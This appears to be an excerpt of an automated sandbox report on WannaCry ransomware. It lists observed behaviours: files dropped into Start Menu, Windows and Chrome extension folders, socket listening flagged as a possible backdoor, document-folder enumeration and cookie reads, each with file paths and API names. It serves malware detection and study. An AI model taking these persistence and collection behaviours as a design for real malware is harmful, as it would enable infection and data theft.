Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SD89A7.tmp
Stores files to the Windows start menu directoryShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\~SD8948.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\~SD8949.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\.sol Editor\~SD895A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\~SD895B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD896B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD896C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\~SD896D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\~SD896E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD896F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\~SD8980.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\~SD8981.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\~SD8982.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SD8983.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SD8984.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD8994.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\~SD8995.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office\Microsoft Office 2010 Tools\~SD89A6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SD89A7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\~SD9373.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD9374.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD9375.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD9376.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD9377.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD9388.tmp

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,14_2_0040D6A0
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_001EAF67 listen,listen,listen,__stack_chk_fail,19_2_001EAF67
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_001EC647 abort,abort,abort,_errno,bind,abort,connect,connect,__stack_chk_fail,19_2_001EC647
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_001EB015 _errno,_errno,setsockopt,bind,bind,getsockname,abort,memcpy,abort,__stack_chk_fail,19_2_001EB015
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_0031739B memset,memset,memset,memset,htonl,abort,bind,listen,getsockname,connect,getsockname,_errno,__stack_chk_fail,19_2_0031739B

Stealing of Sensitive Information:

barindex
Searches for user specific document filesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\Default\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\Default\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\luketaylor\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\luketaylor\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeKey value created or modified: C:\Users\Public\Documents
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDirectory queried: number of queries: 1017
Steals Internet Explorer cookiesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\ML8FX5YH.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\TS324TLF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\SBGGU5ON.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\P2JX6PN9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\70BQC459.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\BQV5SLZ9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\6SKQ9IC9.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\EVRD7JOF.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\XO4C6RUK.txt
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile read: C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\I75LB17C.txt

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\u.wnry
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\ssleay32.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libssp-0.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\taskdl.exe
Source: C:\Windows\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\zlib1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libgcc_s_sjlj-1.dll
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\tor.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libeay32.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\taskse.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\@WanaDecryptor@.exe
Source: C:\mssecsvc.exeFile created: C:\Windows\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\mssecsvc.exeFile created: C:\Windows\tasksche.exe
Installs a Chrome extensionShow sources
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\~SD9419.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\~SD941A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\~SD941B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\~SD942C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ar\~SD942D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\bg\~SD942E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ca\~SD943E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\cs\~SD943F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\da\~SD9440.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\de\~SD9441.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\el\~SD9452.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_GB\~SD9453.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_US\~SD9454.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es\~SD9465.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es_419\~SD9466.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\et\~SD9467.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fi\~SD9477.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fil\~SD9478.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\fr\~SD9479.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\he\~SD947A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\hi\~SD948B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\hu\~SD948C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\id\~SD948D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\it\~SD948E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ja\~SD949F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ko\~SD94A0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\lt\~SD94A1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\lv\~SD94A2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ms\~SD94B2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\nl\~SD94B3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\no\~SD94B4.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pl\~SD94B5.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_BR\~SD94B6.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_PT\~SD94B7.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ro\~SD94C8.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\ru\~SD94C9.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sk\~SD94CA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sl\~SD94DA.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sr\~SD94DB.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\sv\~SD94DC.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\th\~SD94DD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\tr\~SD94EE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\uk\~SD94EF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\vi\~SD94F0.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_CN\~SD94F1.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_TW\~SD94F2.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_metadata\~SD94F3.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\~SD9504.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\~SD9505.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\~SD9506.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ar\~SD9507.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\bg\~SD9508.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ca\~SD9509.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\cs\~SD9519.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\da\~SD951A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\de\~SD951B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\el\~SD951C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_GB\~SD951D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_US\~SD951E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es\~SD951F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419\~SD9520.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\et\~SD9531.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\eu\~SD9532.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fi\~SD9533.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fil\~SD9534.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\fr\~SD9535.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\he\~SD9536.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hi\~SD9537.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hr\~SD9548.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\hu\~SD9549.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\id\~SD954A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\it\~SD954B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ja\~SD954C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ko\~SD954D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lt\~SD954E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\lv\~SD955E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\ms\~SD955F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\nl\~SD9560.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\no\~SD9561.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pl\~SD9562.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_BR\~SD9563.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_PT\~SD9564.tmp
